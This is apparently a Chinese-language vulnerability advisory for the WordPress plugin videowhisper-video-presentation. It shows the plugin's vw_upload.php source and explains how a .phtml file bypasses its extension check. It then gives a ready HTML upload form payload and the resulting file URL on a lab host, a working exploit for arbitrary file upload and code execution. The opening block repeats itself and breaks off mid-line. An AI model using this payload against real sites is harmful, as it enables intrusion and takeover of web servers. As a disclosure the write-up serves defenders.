<ul><li>/vp/vw_upload.php</li></ul><pre class=""><?php if ($_GET["room"]) $room=$_GET["room"]; if ($_POST["room"]) $room=$_POST["room"]; $filename=$_FILES['vw_file']['name']; include_once("incsan.php"); sanV($room); if (!$room) exit; sanV($filename); if (strstr($filename,".php")) $filename = ""; //duplicate php extension not allowed due to vulnerabilities of older web servers if (!$filename) exit; $destination="uploads/".$room."/"; if ($_GET["slides"]) $destination .= "slides/"; $ext=strtolower(substr($filename,-4)); $allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps"); if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename); ?>loadstatus=1 </pre><p>当用户上传phtml文件的时候,$ext为html,绕过检测。</p><p>使用payload上传文件:</p><pre class=""><form action="http://10.211.55.3/wordpress/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php"...
<ul><li>/vp/vw_upload.php</li></ul><pre class=""><?php if ($_GET["room"]) $room=$_GET["room"]; if ($_POST["room"]) $room=$_POST["room"]; $filename=$_FILES['vw_file']['name']; include_once("incsan.php"); sanV($room); if (!$room) exit; sanV($filename); if (strstr($filename,".php")) $filename = ""; //duplicate php extension not allowed due to vulnerabilities of older web servers if (!$filename) exit; $destination="uploads/".$room."/"; if ($_GET["slides"]) $destination .= "slides/"; $ext=strtolower(substr($filename,-4)); $allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps"); if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename); ?>loadstatus=1 </pre><p>当用户上传phtml文件的时候,$ext为html,绕过检测。</p><p>使用payload上传文件:</p><pre class=""><form action="http://10.211.55.3/wordpress/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php" method="post" enctype="multipart/form-data"> <input type="file" name="vw_file"> <input type="text" name="room" value="."> <button type="submit">Submit</button> </form></pre><p><img alt="4626BA47-DBE7-490D-A1FA-38CA9A964340.png" src="https://images.seebug.org/@/uploads/1434332146034-4626BA47-DBE7-490D-A1FA-38CA9A964340.png" data-image-size="680,137"><br></p><p>上传文件并组合文件URL:</p><pre class="">http://10.211.55.3/wordpress/wp-content/plugins/videowhisper-video-presentation/vp/uploads/test.phtml </pre><p><img alt="1E1212DC-CA66-4A9C-9FCF-A1385A92EE00.png" src="https://images.seebug.org/@/uploads/1434332154409-1E1212DC-CA66-4A9C-9FCF-A1385A92EE00.png" data-image-size="674,267"><br></p>
